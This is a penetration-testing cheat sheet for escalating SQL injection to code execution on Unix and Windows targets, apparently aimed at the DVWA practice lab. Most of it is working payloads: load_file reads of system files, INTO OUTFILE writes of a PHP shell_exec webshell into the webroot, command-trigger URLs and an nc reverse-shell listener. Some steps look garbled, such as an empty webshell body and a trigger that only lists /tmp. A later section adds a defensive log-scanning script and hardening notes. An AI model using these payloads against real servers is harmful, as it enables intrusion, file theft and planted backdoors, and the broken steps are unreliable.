# SQLi to code execution

```
# Capitalized, Unix target

' UNION SELECT 1, load_file('/etc/passwd') #


# Using the INTO OUTFILE function to upload a webshell
# Find the webroot first; in this case we use /var/www

# Inject:

' union select 1,'' INTO OUTFILE '/var/www/dvwa/cmd.php' #

# Get command execution to further enumerate targets

http://11.11.11.11/dvwa/cmd.php?cmd=id

# Using perl to get a reverse shell (use bash/python etc.)
# Serve the reverse shell from Kali /tmp using http.server

# Trigger:

http://11.11.11.11/dvwa/cmd.php?cmd=ls /tmp

# Catch the revshell:

nc -nvlp 443

```

**Windows targets**

```
# Windows example:

# Using the load_file function

....debug.php?id= union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')

# Using the INTO OUTFILE function to get code execution

...debug.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'

# Then trigger with

http://11.11.11.11/backdoor.php?cmd=ipconfig

# Get command execution, write a webshell into E drive
# Webroot in example: c:/wamp/www/DVWA/dvwa/
# Enumerate the actual webroot location of the target

....id=' union select 1, load_file('e:/testfile.txt') #

' union select 1, '' INTO OUTFILE 'c:/wamp/www/DVWA/dvwa/cmd.php' #

# Command execution

..dwa/cmd.php?cmd=dir

```
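What the requests above look like from the web server's side, as an added example that is not part of the original notes: a log scan that flags `load_file(` and `INTO OUTFILE` in query parameters, then flags any later request for the file name that was written. The log lines, the regexes and the `scan` function are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines modelled on the requests in these notes.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /debug.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /debug.php?id=1%20union%20all%20select%201,2,load_file(%27C:/Windows/System32/drivers/etc/hosts%27) HTTP/1.1" 200 900',
    '10.0.0.5 - - [01/Jan/2024:10:02:00 +0000] "GET /debug.php?id=1+UNION+ALL+SELECT+1,2,%22x%22+INTO/**/OUTFILE+%27c:/xampp/htdocs/backdoor.php%27 HTTP/1.1" 200 0',
    '10.0.0.5 - - [01/Jan/2024:10:03:00 +0000] "GET /backdoor.php?cmd=ipconfig HTTP/1.1" 200 1300',
    '10.0.0.9 - - [01/Jan/2024:10:04:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
READ = re.compile(r'load_file\s*\(', re.I)
WRITE = re.compile(r"into\s+(?:out|dump)file\s+['\"]([^'\"]+)['\"]", re.I)
COMMENT = re.compile(r'/\*.*?\*/', re.S)  # inline SQL comments used in place of spaces


def scan(lines):
    """Return (line_no, kind, detail) tuples for file-read/file-write SQLi and follow-ups."""
    findings, written = [], set()
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        name = url.path.rsplit('/', 1)[-1].lower()
        if name in written:
            # A file named in an earlier INTO OUTFILE is now being requested.
            findings.append((n, 'request-to-written-file', name))
        # parse_qsl URL-decodes each value (%27 -> ', + -> space).
        for _, raw in parse_qsl(url.query, keep_blank_values=True):
            value = COMMENT.sub(' ', raw)
            if READ.search(value):
                findings.append((n, 'file-read', 'load_file'))
            w = WRITE.search(value)
            if w:
                written.add(re.split(r'[\\/]', w.group(1))[-1].lower())
                findings.append((n, 'file-write', w.group(1)))
    return findings


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Both primitives need the database account to hold MySQL's `FILE` privilege and `secure_file_priv` to permit the path, so a hit here is also a prompt to review those two settings.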

**Practice the basics with**

<https://www.vulnhub.com/entry/damn-vulnerable-web-application-dvwa-107,43/>

